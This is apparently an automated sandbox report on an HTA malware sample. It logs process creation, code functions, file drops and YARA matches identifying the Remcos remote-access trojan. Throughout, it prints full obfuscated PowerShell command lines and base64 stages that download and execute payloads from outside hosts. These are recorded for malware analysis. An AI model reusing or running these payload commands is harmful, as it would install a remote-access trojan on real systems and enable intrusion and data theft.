JJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblem
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblemJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess Stats: CPU usage > 49%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004158B9
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_042F76387_2_042F7638
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_042FB8707_2_042FB870
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_042FA6C87_2_042FA6C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041D07112_2_0041D071
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004520D212_2_004520D2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043D09812_2_0043D098
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043715012_2_00437150
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004361AA12_2_004361AA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0042625412_2_00426254
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043137712_2_00431377
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043651C12_2_0043651C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041E5DF12_2_0041E5DF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044C73912_2_0044C739
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004367C612_2_004367C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004267CB12_2_004267CB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043C9DD12_2_0043C9DD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00432A4912_2_00432A49
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00436A8D12_2_00436A8D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CC0C12_2_0043CC0C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00436D4812_2_00436D48
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434D2212_2_00434D22
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00426E7312_2_00426E73
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00440E2012_2_00440E20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CE3B12_2_0043CE3B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00412F4512_2_00412F45
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00452F0012_2_00452F00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00426FAD12_2_00426FAD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F66 appears 50 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004020E7 appears 40 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004338A5 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00433FB0 appears 55 times
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2065
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2032
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2065Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2032Jump to behavior
                        Source: 7.2.powershell.exe.63d2830.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 7.2.powershell.exe.63d2830.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 7.2.powershell.exe.63d2830.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 7.2.powershell.exe.63d2830.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 7.2.powershell.exe.63d2830.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 7.2.powershell.exe.63d2830.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000007.00000002.2097314015.0000000006332000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 6312, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 6312, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: CasPol.exe PID: 6456, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@18/17@5/4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00416AB7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040E219
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041A63F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\weareusinggoodcompaniesforgifitingbesthingsformetoget[1].tiffJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-GH3PRL
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4wfybco.zme.ps1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS"
                        Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaVirustotal: Detection: 26%
                        Source: sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaReversingLabs: Detection: 15%
                        Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.cmdline"
